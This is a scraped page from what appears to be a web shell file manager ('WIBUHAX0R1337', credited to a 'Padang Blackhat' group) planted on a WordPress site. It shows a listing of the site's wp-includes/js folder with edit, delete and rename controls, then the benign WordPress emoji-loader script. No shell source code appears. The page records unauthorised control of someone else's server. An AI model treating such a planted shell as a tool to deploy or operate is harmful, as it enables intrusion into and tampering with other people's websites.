-
WIBUHAX0R1337
-
/
home
/
cideo
/
sainchargny
/
wp-includes
/
js
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
codemirror
--
NONE
crop
--
NONE
imgareaselect
--
NONE
jcrop
--
NONE
jquery
--
NONE
mediaelement
--
NONE
plupload
--
NONE
swfupload
--
NONE
thickbox
--
NONE
tinymce
--
NONE
admin-bar.js
11.532KB
Edit File
Delete File
Rename
admin-bar.min.js
7.02KB
Edit File
Delete File
Rename
api-request.min.js
0.681KB
Edit File
Delete File
Rename
autosave.js
21.114KB
Edit File
Delete File
Rename
backbone.min.js
22.771KB
Edit File
Delete File
Rename
colorpicker.min.js
16.284KB
Edit File
Delete File
Rename
comment-reply.js
3.368KB
Edit File
Delete File
Rename
customize-base.js
25.014KB
Edit File
Delete File
Rename
customize-base.min.js
7.772KB
Edit File
Delete File
Rename
customize-loader.js
7.66KB
Edit File
Delete File
Rename
customize-loader.min.js
3.439KB
Edit File
Delete File
Rename
customize-models.js
6.603KB
Edit File
Delete File
Rename
customize-models.min.js
3.596KB
Edit File
Delete File
Rename
customize-preview-nav-menus.js
14.609KB
Edit File
Delete File
Rename
customize-preview-nav-menus.min.js
4.932KB
Edit File
Delete File
Rename
customize-preview-widgets.js
20.585KB
Edit File
Delete File
Rename
customize-preview-widgets.min.js
7.714KB
Edit File
Delete File
Rename
customize-preview.js
27.184KB
Edit File
Delete File
Rename
customize-preview.min.js
10.645KB
Edit File
Delete File
Rename
customize-selective-refresh.js
32.48KB
Edit File
Delete File
Rename
customize-selective-refresh.min.js
10.559KB
Edit File
Delete File
Rename
customize-views.min.js
2.365KB
Edit File
Delete File
Rename
heartbeat.js
19.723KB
Edit File
Delete File
Rename
hoverIntent.js
4.833KB
Edit File
Delete File
Rename
hoverIntent.min.js
1.089KB
Edit File
Delete File
Rename
json2.js
17.99KB
Edit File
Delete File
Rename
masonry.min.js
28.275KB
Edit File
Delete File
Rename
mce-view.js
25.118KB
Edit File
Delete File
Rename
mce-view.min.js
9.516KB
Edit File
Delete File
Rename
media-editor.js
28.229KB
Edit File
Delete File
Rename
media-editor.min.js
10.649KB
Edit File
Delete File
Rename
media-grid.js
27.068KB
Edit File
Delete File
Rename
media-models.js
43.034KB
Edit File
Delete File
Rename
media-models.min.js
13.24KB
Edit File
Delete File
Rename
quicktags.js
21.866KB
Edit File
Delete File
Rename
quicktags.min.js
10.888KB
Edit File
Delete File
Rename
shortcode.min.js
2.552KB
Edit File
Delete File
Rename
swfobject.js
9.991KB
Edit File
Delete File
Rename
tw-sack.js
4.853KB
Edit File
Delete File
Rename
twemoji.js
24.895KB
Edit File
Delete File
Rename
underscore.min.js
16.025KB
Edit File
Delete File
Rename
utils.js
4.415KB
Edit File
Delete File
Rename
utils.min.js
1.782KB
Edit File
Delete File
Rename
wp-a11y.js
2.514KB
Edit File
Delete File
Rename
wp-a11y.min.js
0.638KB
Edit File
Delete File
Rename
wp-ajax-response.js
3.048KB
Edit File
Delete File
Rename
wp-ajax-response.min.js
2.019KB
Edit File
Delete File
Rename
wp-api.js
45.61KB
Edit File
Delete File
Rename
wp-api.min.js
14.345KB
Edit File
Delete File
Rename
wp-auth-check.js
3.229KB
Edit File
Delete File
Rename
wp-auth-check.min.js
1.741KB
Edit File
Delete File
Rename
wp-backbone.js
10.243KB
Edit File
Delete File
Rename
wp-backbone.min.js
2.949KB
Edit File
Delete File
Rename
wp-custom-header.js
10.148KB
Edit File
Delete File
Rename
wp-custom-header.min.js
4.357KB
Edit File
Delete File
Rename
wp-embed-template.js
6.045KB
Edit File
Delete File
Rename
wp-embed-template.min.js
3.044KB
Edit File
Delete File
Rename
wp-embed.js
3.067KB
Edit File
Delete File
Rename
wp-embed.min.js
1.365KB
Edit File
Delete File
Rename
wp-emoji-loader.js
5.158KB
Edit File
Delete File
Rename
wp-emoji-loader.min.js
1.742KB
Edit File
Delete File
Rename
wp-list-revisions.js
0.893KB
Edit File
Delete File
Rename
wp-lists.js
24.644KB
Edit File
Delete File
Rename
wp-lists.min.js
7.239KB
Edit File
Delete File
Rename
wp-pointer.min.js
3.554KB
Edit File
Delete File
Rename
wp-sanitize.min.js
0.388KB
Edit File
Delete File
Rename
wp-util.js
3.83KB
Edit File
Delete File
Rename
wp-util.min.js
1.021KB
Edit File
Delete File
Rename
wpdialog.js
0.425KB
Edit File
Delete File
Rename
wpdialog.min.js
0.231KB
Edit File
Delete File
Rename
wplink.js
20.521KB
Edit File
Delete File
Rename
zxcvbn-async.js
0.49KB
Edit File
Delete File
Rename
zxcvbn.min.js
802.932KB
Edit File
Delete File
Rename
( function( window, document, settings ) { var src, ready, ii, tests; /* * Create a canvas element for testing native browser support * of emoji. */ var canvas = document.createElement( 'canvas' ); var context = canvas.getContext && canvas.getContext( '2d' ); /** * Check if two sets of Emoji characters render the same. * * @param set1 array Set of Emoji characters. * @param set2 array Set of Emoji characters. * @returns {boolean} True if the two sets render the same. */ function emojiSetsRenderIdentically( set1, set2 ) { var stringFromCharCode = String.fromCharCode; // Cleanup from previous test. context.clearRect( 0, 0, canvas.width, canvas.height ); context.fillText( stringFromCharCode.apply( this, set1 ), 0, 0 ); var rendered1 = canvas.toDataURL(); // Cleanup from previous test. context.clearRect( 0, 0, canvas.width, canvas.height ); context.fillText( stringFromCharCode.apply( this, set2 ), 0, 0 ); var rendered2 = canvas.toDataURL(); return rendered1 === rendered2; } /** * Detect if the browser supports rendering emoji or flag emoji. Flag emoji are a single glyph * made of two characters, so some browsers (notably, Firefox OS X) don't support them. * * @since 4.2.0 * * @param type {String} Whether to test for support of "flag" or "emoji". * @return {Boolean} True if the browser can render emoji, false if it cannot. */ function browserSupportsEmoji( type ) { var isIdentical; if ( ! context || ! context.fillText ) { return false; } /* * Chrome on OS X added native emoji rendering in M41. Unfortunately, * it doesn't work when the font is bolder than 500 weight. So, we * check for bold rendering support to avoid invisible emoji in Chrome. */ context.textBaseline = 'top'; context.font = '600 32px Arial'; switch ( type ) { case 'flag': /* * Test for UN flag compatibility. This is the least supported of the letter locale flags, * so gives us an easy test for full support. * * To test for support, we try to render it, and compare the rendering to how it would look if * the browser doesn't render it correctly ([U] + [N]). */ isIdentical = emojiSetsRenderIdentically( [ 55356, 56826, 55356, 56819 ], [ 55356, 56826, 8203, 55356, 56819 ] ); if ( isIdentical ) { return false; } /* * Test for English flag compatibility. England is a country in the United Kingdom, it * does not have a two letter locale code but rather an five letter sub-division code. * * To test for support, we try to render it, and compare the rendering to how it would look if * the browser doesn't render it correctly (black flag emoji + [G] + [B] + [E] + [N] + [G]). */ isIdentical = emojiSetsRenderIdentically( [ 55356, 57332, 56128, 56423, 56128, 56418, 56128, 56421, 56128, 56430, 56128, 56423, 56128, 56447 ], [ 55356, 57332, 8203, 56128, 56423, 8203, 56128, 56418, 8203, 56128, 56421, 8203, 56128, 56430, 8203, 56128, 56423, 8203, 56128, 56447 ] ); return ! isIdentical; case 'emoji': /* * Emoji allows people of all gender levitate and so does WordPress. * * To test for support, try to render a new emoji (woman in business suit levitating), * then compare it to how it would look if the browser doesn't render it correctly * (person in business suit levitating + female sign). */ isIdentical = emojiSetsRenderIdentically( [55357, 56692, 8205, 9792, 65039], [55357, 56692, 8203, 9792, 65039] ); return ! isIdentical; } return false; } function addScript( src ) { var script = document.createElement( 'script' ); script.src = src; script.defer = script.type = 'text/javascript'; document.getElementsByTagName( 'head' )[0].appendChild( script ); } tests = Array( 'flag', 'emoji' ); settings.supports = { everything: true, everythingExceptFlag: true }; for( ii = 0; ii < tests.length; ii++ ) { settings.supports[ tests[ ii ] ] = browserSupportsEmoji( tests[ ii ] ); settings.supports.everything = settings.supports.everything && settings.supports[ tests[ ii ] ]; if ( 'flag' !== tests[ ii ] ) { settings.supports.everythingExceptFlag = settings.supports.everythingExceptFlag && settings.supports[ tests[ ii ] ]; } } settings.supports.everythingExceptFlag = settings.supports.everythingExceptFlag && ! settings.supports.flag; settings.DOMReady = false; settings.readyCallback = function() { settings.DOMReady = true; }; if ( ! settings.supports.everything ) { ready = function() { settings.readyCallback(); }; if ( document.addEventListener ) { document.addEventListener( 'DOMContentLoaded', ready, false ); window.addEventListener( 'load', ready, false ); } else { window.attachEvent( 'onload', ready ); document.attachEvent( 'onreadystatechange', function() { if ( 'complete' === document.readyState ) { settings.readyCallback(); } } ); } src = settings.source || {}; if ( src.concatemoji ) { addScript( src.concatemoji ); } else if ( src.wpemoji && src.twemoji ) { addScript( src.twemoji ); addScript( src.wpemoji ); } } } )( window, document, window._wpemojiSettings );
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat